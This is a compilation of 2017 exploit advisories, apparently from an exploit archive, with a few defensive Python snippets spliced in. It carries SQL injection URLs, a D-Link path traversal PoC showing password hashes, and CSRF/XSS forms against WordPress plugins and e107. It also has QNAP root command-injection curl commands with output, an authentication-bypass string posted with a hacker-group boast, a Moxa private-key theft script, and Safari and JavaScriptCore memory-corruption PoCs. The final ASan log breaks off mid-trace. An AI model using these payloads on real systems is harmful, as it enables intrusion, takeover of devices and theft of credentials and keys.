# # # # #
# Exploit Title: Survey Template v1.1 for ASPRunnerPro,PHPRunner. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=3
# Demo: https://xlinesoft.com/livedemo/survey/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/svv_questions_list.php?mastertable=svv_surveys&masterkey1=[SQL]
# # # # #
# # # # #
# Exploit Title: My Gaming Ladder Combo System 7.5 - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: http://www.mygamingladder.com/
# Software: http://www.mygamingladder.com/demos.shtml
# Demo: http://www.mygamingladder.com/upgrade/combo/
# Version: 7.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/game.php?gameid=[SQL]
# http://localhost/[PATH]/news.php?newsid=[SQL]
# http://localhost/[PATH]/teams.php?teamid=[SQL]
# http://localhost/[PATH]/match.php?matchid=[SQL]
# staff
# staffaccess
# staffcomments
# teammembers
# teammembersinv
# teams
# # # # #
# # # # #
# Exploit Title: My Gaming Ladder System 6.0 - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: http://www.mygamingladder.com/
# Software: http://www.mygamingladder.com/ladder.shtml
# Demo: http://www.ladder.tf2.co.za/
# Version: 6.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/news.php?faqid=[SQL]
# staff :id
# staff :displayname
# staff :pass
# staff :email
# staff :title
# staff :access
# staff :contact
# # # # #
# Title: D-Link DWR-116 Arbitrary File Download
# Vendor: D-Link (www.dlink.com)
# Affected model(s): DWR-116 / DWR-116A1
# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)
# CVE: CVE-2017-6190
# Date: 04.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)
Description:
D-Link DWR-116 with firmware before V1.05b09 suffers from a vulnerability
which allows unauthorized file download from the device filesystem.
PoC:
HTTP Request:
GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.2.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP Response:
HTTP/1.0 200 OK
Content-Type: application/x-none
Cache-Control: max-age=60
Connection: close
root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin
Fix:
Update device to the new firmware (V1.05b09)
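As an added illustration of the fix this advisory implies (not the device's own code, and not D-Link's), the Python function below resolves a request path the way a hardened handler for a served prefix should: it percent-decodes, collapses the dot-segments, and only then checks that the path is still under the prefix, while a plain prefix check, shown alongside, accepts the advisory's request unchanged. The `/uir/` prefix mapping to a single served directory is an assumption taken from the PoC request.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# The exact request path from the advisory's PoC (copied, not constructed).
POC_PATH = "/uir/../../../../../../../../../../../../../../../../etc/passwd"

# Assumption: the device serves everything under "/uir/" from one directory.
SERVED_PREFIX = "/uir/"


def naive_prefix_check(request_path: str) -> bool:
    """The kind of check that lets the PoC through: it only looks at how
    the path starts and never resolves the embedded "../" segments."""
    return request_path.startswith(SERVED_PREFIX)


def resolve_under_prefix(request_path: str,
                         served_prefix: str = SERVED_PREFIX) -> Optional[str]:
    """Return the file path relative to the served directory, or None if the
    request escapes it.

    Order matters: percent-decode first (so "%2e%2e" cannot hide a dot
    segment), then normalize, then compare against the prefix. normpath
    collapses "/uir/../../etc/passwd" to "/etc/passwd", which no longer
    starts with "/uir/" and is therefore rejected.
    """
    decoded = unquote(request_path)
    if "\x00" in decoded:          # a NUL byte can truncate the path in C handlers
        return None
    normalized = posixpath.normpath(decoded)
    if not normalized.startswith(served_prefix):
        return None
    relative = normalized[len(served_prefix):]
    # Empty means a request for the directory itself; refuse to serve that.
    return relative or None


if __name__ == "__main__":
    print("naive check accepts PoC:", naive_prefix_check(POC_PATH))
    print("hardened check resolves PoC to:", resolve_under_prefix(POC_PATH))
```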
<!--
Details
================
Software: WordPress Firewall 2
Version: 1.3
Homepage: https://wordpress.org/plugins/wordpress-firewall-2/
Advisory report: https://security.dxw.com/advisories/csrfstored-xss-in-wordpress-firewall-2-allows-unauthenticated-attackers-to-do-almost-anything-an-admin-can/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
Description
================
CSRF/stored XSS in WordPress Firewall 2 allows unauthenticated attackers to do almost anything an admin can
Vulnerability
================
HTML is not escaped and there is no CSRF prevention, meaning attackers can put arbitrary HTML content onto the settings page.
Proof of concept
================
Visit the following page, click on the submit button, then visit the plugin’s options page:
-->
<form method="POST" action="http://localhost/wp-admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php">
<input type="text" name="email_address" value=""><script>alert(1)</script>">
<input type="text" name="set_email" value="Set Email">
<input type="submit">
</form>
<!--
In a real attack, forms can be submitted automatically and spear-phishing attacks can be convincing.
Mitigations
================
Disable the plugin until a new version is released that fixes this bug.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report within 14 days.
Timeline
================
2016-12-23: Discovered
2017-03-16: Reported to vendor by email
2017-04-04: Vendor could not be contacted
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
-->
QNAP QTS multiple RCE vulnerabilities
=====================================
The latest version of this advisory is available at:
https://sintonen.fi/advisories/qnap-qts-multiple-rce-vulnerabilities.txt
Overview
--------
QNAP QTS firmware contains multiple Command Injection (CWE-77)
vulnerabilities that can be exploited to gain remote command execution
on the devices.
Description
-----------
QNAP QTS web user interface CGI binaries include Command Injection
(CWE-77) vulnerabilities. An unauthenticated attacker can execute
arbitrary commands on the targeted device.
Impact
------
The attacker is able to execute arbitrary commands as the administrative
user (root). The attacker has full access to all content on the targeted
device, and can read, modify or remove content at will.
Details
-------
The discovered vulnerabilities, described in more detail below, enable
multiple independent attacks described here in brief:
- Unauthenticated Remote Command Execution
The unauthenticated attacker can perform HTTP requests that exploit
the vulnerability to execute arbitrary commands. If the device is
connected to the internet, the vulnerable devices can be taken over in
an automated fashion and can then be used for further attacks.
- Authenticated Remote Command Execution
The authenticated attacker can perform HTTP requests that exploit
the vulnerabilities to execute arbitrary commands. This gives users
that normally have only restricted access to the device full
administrative (root) access to the system and access to all data
stored on the device regardless of the specified access limitations.
Vulnerabilities
---------------
1. [CVE-2017-6361] Command Injection in authLogin.cgi `reboot_notice_msg' (CWE-77)
/cgi-bin/authLogin.cgi CGI has a command injection bug. The
following commands are executed via system():
/sbin/vjbod_util -i '%s' 1>>/dev/null 2>&1
/sbin/vdd_control "%s" %d 2>>/dev/null 2>>/dev/null
The value inserted to %s is obtained from the `reboot_notice_msg' HTTP
request GET parameter.
The reboot_notice_msg is a base64 encoded message of form:
QNAPVJBDTTTTTTTTCCCCCCCCCCCCCCCCLLLLPAYLOAD
- TTTTTTTT is the unix time stamp (last 8 digits)
- CCCCCCCCCCCCCCCC is the command to perform (Disconnect)
- LLLL is the payload length
- PAYLOAD is the payload contents (LLLL bytes)
By creating a crafted reboot_notice_msg value, arbitrary commands
can be executed. For example:
QNAPVJBD88150863 Disconnect 14`(echo;id)>&2`
$ curl -ki "https://TARGET/cgi-bin/authLogin.cgi?reboot_notice_msg=$(printf 'QNAPVJBD%08d%16s 14`(echo;id)>&2`' $(expr $(date +%s) % 100000000) Disconnect|base64|tr -d '\r\n')"
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
Content-type: text/xml
<?xml version="1.0" encoding="UTF-8" ?>
<QDocRoot version="1.0">
<command>Disconnect</command>
<payload>`(echo;id)>&2`</payload>
</QDocRoot>
$
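The following added example (not QNAP's code) shows what a strict parser for the documented reboot_notice_msg layout looks like: decode the base64, check each fixed-width field, whitelist the command, verify the declared length, whitelist the payload characters, and hand the payload to the helper as a single argv element instead of through a shell. The payload character set is an assumption, the advisory's printf example pads its fields more loosely than this strict layout (so the real CGI presumably parses more leniently), and the sample messages are constructed.

```python
import base64
import binascii
import re
from typing import Dict, List

MAGIC = b"QNAPVJBD"
HEADER_LEN = 8 + 8 + 16 + 4            # magic, timestamp, command, length
ALLOWED_COMMANDS = {"Disconnect"}      # the only command the advisory names
# Assumption: a legitimate payload is an identifier-like token. Anything
# else (quotes, backticks, $(), ;, &, >, whitespace) is refused outright.
SAFE_PAYLOAD = re.compile(r"[A-Za-z0-9._-]{1,64}")


class RebootNoticeError(ValueError):
    """Raised when a reboot_notice_msg value fails strict validation."""


def parse_reboot_notice_msg(raw_b64: str) -> Dict[str, object]:
    """Decode and validate one reboot_notice_msg query parameter.

    Layout (from the advisory):
        QNAPVJBD | TTTTTTTT | CCCCCCCCCCCCCCCC | LLLL | PAYLOAD
    Every field is checked before the payload can reach any command.
    """
    try:
        data = base64.b64decode(raw_b64, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise RebootNoticeError(f"not valid base64: {exc}") from None
    if not data.startswith(MAGIC) or len(data) < HEADER_LEN:
        raise RebootNoticeError("bad magic or truncated header")
    ts, cmd, length, payload = data[8:16], data[16:32], data[32:36], data[36:]
    if not ts.isdigit():
        raise RebootNoticeError("timestamp must be 8 ASCII digits")
    command = cmd.decode("ascii", errors="replace").strip()
    if command not in ALLOWED_COMMANDS:
        raise RebootNoticeError(f"command not allowed: {command!r}")
    if not length.isdigit() or int(length) != len(payload):
        raise RebootNoticeError("declared length does not match payload")
    text = payload.decode("ascii", errors="replace")
    if not SAFE_PAYLOAD.fullmatch(text):
        raise RebootNoticeError("payload contains characters outside the whitelist")
    return {"timestamp": int(ts), "command": command, "payload": text}


def is_valid_reboot_notice_msg(raw_b64: str) -> bool:
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        parse_reboot_notice_msg(raw_b64)
        return True
    except RebootNoticeError:
        return False


def build_vjbod_argv(payload: str) -> List[str]:
    """The execv-style replacement for the advisory's system() call: the
    payload travels as one argument, so no shell ever interprets it."""
    return ["/sbin/vjbod_util", "-i", payload]


def encode_reboot_notice_msg(timestamp: int, command: str, payload: str) -> str:
    """Build a message in the documented layout. Used here only to construct
    inputs; the advisory does not show the client-side encoder."""
    body = (MAGIC
            + f"{timestamp % 100_000_000:08d}".encode("ascii")
            + command.ljust(16).encode("ascii")
            + f"{len(payload):04d}".encode("ascii")
            + payload.encode("ascii"))
    return base64.b64encode(body).decode("ascii")


# Constructed samples: a benign disconnect and the advisory's injection payload.
BENIGN_MSG = encode_reboot_notice_msg(1488150863, "Disconnect", "vjbod01")
INJECTED_MSG = encode_reboot_notice_msg(1488150863, "Disconnect", "`(echo;id)>&2`")

if __name__ == "__main__":
    print("benign accepted:", is_valid_reboot_notice_msg(BENIGN_MSG))
    print("injected accepted:", is_valid_reboot_notice_msg(INJECTED_MSG))
```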
2. [CVE-2017-6360] Command Injection in userConfig.cgi cloudPersonalSmtp `hash' (CWE-77)
/cgi-bin/userConfig.cgi CGI has a command injection bug. The following
command is executed via popen():
/sbin/cloud_util -r %s 2>/dev/null
The value inserted to %s is obtained from the `hash' HTTP request GET
parameter.
An authenticated user can use a specially crafted hash parameter to execute
arbitrary commands as root:
$ curl -ki 'https://TARGET/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`'
HTTP/1.1 200 OK
Date: Sun, 26 Feb 2017 22:55:48 GMT
Transfer-Encoding: chunked
Content-Type: text/plain
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
Linux TARGET 3.12.6 #1 SMP Mon Feb 13 01:43:01 CST 2017 x86_64 unknown
Content-type: text/html; charset="UTF-8"
Usage:
/sbin/cloud_util -r [enc_token]
$
3. [CVE-2017-6359] Command Injection in utilRequest.cgi cancel_trash_recovery `pid' (CWE-77)
/cgi-bin/filemanager/utilRequest.cgi CGI has a command injection bug. The
following commands are executed via system():
/bin/kill -9 %s
The value inserted to %s is obtained from the `pid' HTTP request GET
parameter.
An authenticated user can use a specially crafted pid parameter to execute
arbitrary commands as root:
$ curl -k 'https://TARGET/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recovery&sid=SIDVALUE&pid=`id>/tmp/pwned`'
{ "version": "4.2.1", "build": "20170213", "status": 0, "success": "true" }
[~] # cat /tmp/pwned
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
[~] #
Vulnerable devices
------------------
The vulnerabilities were discovered on a QNAP TVS-663, firmware version
4.2.2 Build 20161214. They're also confirmed to work with version 4.2.3
Build 20170213.
CVE-2017-6361 was also confirmed on QNAP HS-251+ running QTS 4.2.2 Build
20161028.
It is believed that these vulnerabilities affect all devices running QTS.
Recommendations to vendor
-------------------------
1. Fix the command injection vulnerabilities by performing proper input
validation (whitelisting) and/or shell metacharacter escaping, or by
utilizing the execl family of functions.
End user mitigation
-------------------
- Install the firmware update version 4.2.4 build 20170313 or later.
OR
- Restrict access to the web user interface (ports 8080 and 443).
Credits
-------
The vulnerabilities were discovered by Harry Sintonen / F-Secure Corporation.
Timeline
--------
21.01.2017 discovered vulnerabilities 2 and 3
23.02.2017 discovered vulnerability 1
23.02.2017 reported vulnerability 1 to the vendor
26.02.2017 started to write a preliminary advisory
27.02.2017 sent the preliminary advisory to vendor and CERT-FI
27.02.2017 requested CVE-IDs from MITRE
28.02.2017 received CVE-IDs from MITRE
02.03.2017 inquired status from vendor contact
02.03.2017 vendor confirmed CVE-2017-6361
04.03.2017 vendor confirmed the other two vulnerabilities
13.03.2017 vendor communicated about an upcoming release fixing the vulns
14.03.2017 vendor released QTS 4.2.4 build 20170313 fixing the vulns
15.03.2017 sent update to CERT-FI
21.03.2017 vendor released NAS-201703-21 advisory:
https://www.qnap.com/en/support/con_show.php?cid=113
06.04.2017 public release of the advisory
<!--
==========================
Title:Mutiple CSRF vulnerabilities in e107 CMS 2.1.4
Author:Zhiyang Zeng
Product:
—————
e107 is a powerful website content management system designed for bootstrap v3 from http://e107.org/get-started
—————
Fix
—————
Fixed in git source code https://github.com/e107inc/e107/commit/7a3e3d9fc7e05ce6941b9af1c14010bf2141f1a5
—————
Summary
————
e107 CMS version 2.1.4 is vulnerable to cross-site request forgery in plugin installing, meta changing and settings changing; a malicious web page can use
forged requests to make e107 download and install a plug-in provided by the attacker.
————
Timeline
———
2017-03-01 report to vendor
2017-03-02 GitHub commit to fix token missing
———
Reproduce:
==========
I just give an uninstall-any-plugin POC.
Vulnerable address: http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php
POC:
-->
<form action="http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php?uninstall.8" method="post">
<input type="text" name="delete_tables" value="1">
<input type="text" name="delete_ipool" value="1">
<input type="text" name="delete_files" value="0">
<input type="text" name="uninstall_confirm" value="Confirm uninstall">
<input type="submit" name="submit">
</form>
<!--
Description:
I try to uninstall the plugin gallery, whose id is 8.
After visiting the above POC page, you will find the gallery plugin has been uninstalled successfully!
===========
-->
======
Software: WordPress WHIZZ
Version: <1.1.1
Homepage: https://wordpress.org/plugins/whizz/
=======
Description
================
GET-type CSRF in WordPress WHIZZ allows attackers to delete any WordPress user and change plugin status
POC:
========
Include the following in a page; the attack then occurs when it loads:
delete user:
<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=users-list&uid=4&view=list_view&deletec=yes&list_of=all_users">
activate or deactivate plugins:
<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=activatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">
<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=deactivatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">
Mitigations
================
Disable the plugin until a new version is released that fixes this bug.
FIX:
==========
https://wordpress.org/plugins/whizz/ 1.1.1 changelog->Specifically
<!--
=======
Software: CopySafe Web
version: <2.6
description: Add copy protection from PrintScreen and screen capture. Copysafe Web uses encrypted images and domain lock to extend copy protection for all media displayed on a web page.
========
Description
==========
CSRF in WordPress CopySafe Web allows an attacker to change plugin settings
========
POC:
=======
-->
<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">
<input type="text" name= "admin_only" value="checked">
<input type="text" name="asps" value="">
<input type="text" name="upload_path" value="">
<input type="text" name="max_size" value="">
<input type="text" name="mode" value="checked">
<input type="text" name="submit" value="Save Settings">
<input type="submit">
</form>
<!--
=========
Mitigations
================
Disable the plugin until a new version is released that fixes this bug.
Fixed
=========
https://wordpress.org/plugins/wp-copysafe-web/ changelog -> 2.6 release
-->
----------------
Title = Jobscript4Web 4.5 - Authentication Bypass
Date = 8/4/2017
Soft = http://www.jobscript4web.com/index.html
Live Demo = http://www.simplejobs.co.in/soft4u
---------------
Author = TurkCyberArmy
---------------
We have begun our duty within the Turkish cyber army. We came to give confidence to friends and fear to enemies.
With our own operating systems, our own programming languages, and software we developed ourselves, we are here now.
The virtual world is under our control. All the sites and systems belonging to the Turkish state are in safe hands.
We wanted you to know!!!
Turkish Cyber Stars!
---------------
+ Exploitation Details +
---------------
HTTP://Path/soft4u/
user : ' or '2=2 password : ' or '2=2
---------------
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-REMOTE-PRIVATE-KEY-DISCLOSURE.txt
[+] ISR: APPARITIONSEC
Vendor:
============
www.moxa.com
Product:
===========
MXview V2.8
Download:
http://www.moxa.com/product/MXstudio.htm
MXview Industrial Network Management Software.
Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notification—anytime, anywhere.
Vulnerability Type:
=============================
Remote Private Key Disclosure
CVE Reference:
==============
CVE-2017-7455
Security Issue:
================
MXview stores a copy of its web server's private key under C:\Users\TARGET-USER\AppData\Roaming\moxa\mxview\web\certs\mxview.key.
Because that directory is inside the served web root, remote attackers can read the private key file "mxview.key" with a single HTTP GET request.
e.g.
curl -v http://VICTIM-IP:81/certs/mxview.key
* About to connect() to VICTIM-IP port 81
* Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 81
> GET /certs/mxview.key HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5
> Host: VICTIM-IP:81
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Tue Feb 28 14:18:00 2017
< Server: GoAhead-Webs
< Last-modified: Tue Feb 28 10:46:51 2017
< Content-length: 916
< Content-type: text/plain
-----BEGIN PRIVATE KEY-----
[private key material omitted]
-----END PRIVATE KEY-----
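Added example, not Moxa's code: a scan that walks a served directory tree and reports every file containing PEM private-key material, which is the check an administrator can run against the MXview web root (or any other GoAhead docroot) after updating. The directory layout built by the helper is constructed to mirror the advisory's web/certs/mxview.key path, and the key and certificate bodies are dummy text.

```python
import tempfile
from pathlib import Path
from typing import List

# PEM headers that mark private-key material (PKCS#8, PKCS#1, SEC1, encrypted PKCS#8).
PRIVATE_KEY_MARKERS = (
    b"-----BEGIN PRIVATE KEY-----",
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN ENCRYPTED PRIVATE KEY-----",
)


def find_exposed_private_keys(webroot: str) -> List[str]:
    """Return web-relative paths of every file under webroot whose first
    4 KiB contains a PEM private-key header, i.e. files a GET could fetch
    exactly as the advisory's curl request does. Only the head of each
    file is read, so large static assets cost little."""
    root = Path(webroot)
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        try:
            with path.open("rb") as fh:
                head = fh.read(4096)
        except OSError:
            continue          # unreadable files cannot be served either
        if any(marker in head for marker in PRIVATE_KEY_MARKERS):
            hits.append(path.relative_to(root).as_posix())
    return hits


def build_demo_webroot() -> str:
    """Constructed directory mirroring the advisory's .../web/certs/ layout.
    The key and certificate bodies are dummy text, not real material."""
    webroot = tempfile.mkdtemp(prefix="mxview-web-")
    certs = Path(webroot, "certs")
    certs.mkdir()
    (certs / "mxview.key").write_bytes(
        b"-----BEGIN PRIVATE KEY-----\nCONSTRUCTED-DUMMY-KEY-BODY\n-----END PRIVATE KEY-----\n")
    (certs / "mxview.crt").write_bytes(
        b"-----BEGIN CERTIFICATE-----\nCONSTRUCTED-DUMMY-CERT-BODY\n-----END CERTIFICATE-----\n")
    Path(webroot, "index.html").write_text("<html><body>MXview</body></html>\n")
    return webroot


if __name__ == "__main__":
    demo = build_demo_webroot()
    for hit in find_exposed_private_keys(demo):
        print(f"private key reachable via the web root: /{hit}")
```

The public certificate in the same directory is deliberately not reported; only the key needs to live outside the served tree.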
Exploit:
=========
import socket
print 'Moxa MXview 2.8 Remote Private Key Theft'
print 'by hyp3rlinx\n'
IP=raw_input("[Moxa MXview IP]> ")
PORT=int(raw_input("[PORT]> "))
STEAL_PRV_KEY="GET /certs/mxview.key HTTP/1.1\r\nHost: "+IP+"\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(STEAL_PRV_KEY)
print 'Enjoy ur private server key!\n'
print s.recv(512)
s.close()
Network Access:
===============
Remote
Severity:
=========
Critical
Disclosure Timeline:
===================================
Vendor Notification: March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1119
This is somewhat similar to https://crbug.com/663476.
Here's a snippet of Container::replaceAllChildren.
while (RefPtr<Node> child = m_firstChild) {
removeBetween(nullptr, child->nextSibling(), *child);
notifyChildNodeRemoved(*this, *child);
}
If the location hash value is set, the page gives focus to the associated element. However, if a stylesheet has not been loaded yet, the focusing is delayed until the stylesheet gets loaded. The problem is that when the link element for the last pending stylesheet is removed from its parent, the notifyChildNodeRemoved function may end up firing a focus event that runs arbitrary JavaScript code, which can create an iframe (|g| in the PoC) that has an attached frame but has no parent.
Tested on Safari 10.0.3(12602.4.8).
-->
<html>
<head>
</head>
<body>
<script>
let f = document.body.appendChild(document.createElement('iframe'));
let inp = f.contentDocument.head.appendChild(document.createElement('input'));
let link = inp.appendChild(document.createElement('link'));
link.rel = 'stylesheet';
link.href = 'data:,aaaaazxczxczzxzcz';
let btn = f.contentDocument.body.appendChild(document.createElement('button'));
btn.id = 'btn';
btn.onfocus = () => {
btn.onfocus = null;
window.g = inp.appendChild(document.createElement('iframe'));
window.g.onload = () => {
window.g.onload = null;
window.g.src = 'javascript:alert(location)';
let xml = `
<svg xmlns="http://www.w3.org/2000/svg">
<script>
document.documentElement.appendChild(parent.g);
</sc` + `ript>
<element a="1" a="2" />
</svg>`;
let h = document.body.appendChild(document.createElement('iframe'));
h.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));
};
window.g.src = 'https://abc.xyz/';
};
f.contentWindow.location.hash = 'btn';
inp.textContent = '';
</script>
</body>
</html>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1101
Note: It seems it doesn't crash the JSC compiled without Address Sanitizer.
PoC:
-->
(function () {
for (var i = 0; i < 1000000; ++i) {
const v = Array & 1 ? v : 1;
typeof o <= 'object';
}
}());
<!--
Asan Log:
=================================================================
==32191==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000099738 at pc 0x000106c7af16 bp 0x700006a57850 sp 0x700006a57848
READ of size 8 at 0x607000099738 thread T20
==32191==AddressSanitizer: while reporting a bug found another one. Ignoring.
#0 0x106c7af15 in JSC::B3::Procedure::resetReachability() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4c7f15)
#1 0x106a1be8c in JSC::B3::generateToAir(JSC::B3::Procedure&, unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x268e8c)
#2 0x106a1bd2f in JSC::B3::prepareForGeneration(JSC::B3::Procedure&, unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x268d2f)
#3 0x107424312 in JSC::FTL::compile(JSC::FTL::State&, JSC::DFG::Safepoint::Result&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc71312)
#4 0x107232f3b in JSC::DFG::Plan::compileInThreadImpl(JSC::DFG::LongLivedState&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa7ff3b)
#5 0x10722f7e2 in JSC::DFG::Plan::compileInThread(JSC::DFG::LongLivedState&, JSC::DFG::ThreadData*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa7c7e2)
#6 0x1073e1b87 in JSC::DFG::Worklist::ThreadBody::work() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc2eb87)
#7 0x10802330b in WTF::AutomaticThread::start(WTF::Locker<WTF::LockBase> const&)::$_0::operator()() const (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x187030b)
#8 0x1080974bd in WTF::threadEntryPoint(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e44bd)
#9 0x108097b9d in WTF::wtfThreadEntryPoint(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e4b9d)
#10 0x7fffeb99baaa in _pthread_body (/usr/lib/system/libsystem_pthread.dylib+0x3aaa)
#11 0x7fffeb99b9f6 in _pthread_start (/usr/lib/system/libsystem_pthread.dylib+0x39f6)
#12 0x7fffeb99b1fc in thread_start (/usr/lib/system/libsystem_pthread.dylib+0x31fc)
0x607000099738 is located 72 bytes inside of 80-byte region [0x6070000996f0,0x607000099740)
freed by thread T20 here:
#0 0x1031d4cf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)
#1 0x1080b073f in bmalloc::Deallocator::deallocateSlowCase(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18fd73f)
#2 0x106c7d70d in JSC::B3::Procedure::deleteOrphans() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4ca70d)
#3 0x107439a98 in JSC::FTL::(anonymous namespace)::LowerDFGToB3::lower() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc86a98)
#4 0x10743889a in JSC::FTL::lowerDFGToB3(JSC::FTL::State&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc8589a)
#5 0x107232ee5 in JSC::DFG::Plan::compileInThreadImpl(JSC::DFG::LongLivedState&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa7fee5)
#6 0x10722f7e2 in JSC::DFG::Plan::compileInThread(JSC::DFG::LongLivedState&, JSC::DFG::ThreadData*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa7c7e2)
#7 0x1073e1b87 in JSC::DFG::Worklist::ThreadBody::work() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xc2eb87)
#8 0x10802330b in WTF::AutomaticThread::start(WTF::Locker<WTF::LockBase> const&)::$_0::operator()() const (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x187030b)
#9 0x1080974bd in WTF::threadEntryPoint(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e44bd)
#10 0x108097b9d in WTF::wtfThreadEntryPoint(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18e4b9d)
#11 0x7fffeb99baaa in _pthread_body (/usr/lib/system/libsystem_pthread.dylib+0x3aaa)
#12 0x7fffeb99b9f6 in _pthread_start (/usr/lib/system/libsystem_pthread.dylib+0x39f6)
#13 0x7fffeb99b1fc in thread_start (/usr/lib/system/libsystem_pthread.dylib+0x31fc)
previously allocated by thread T20 here:
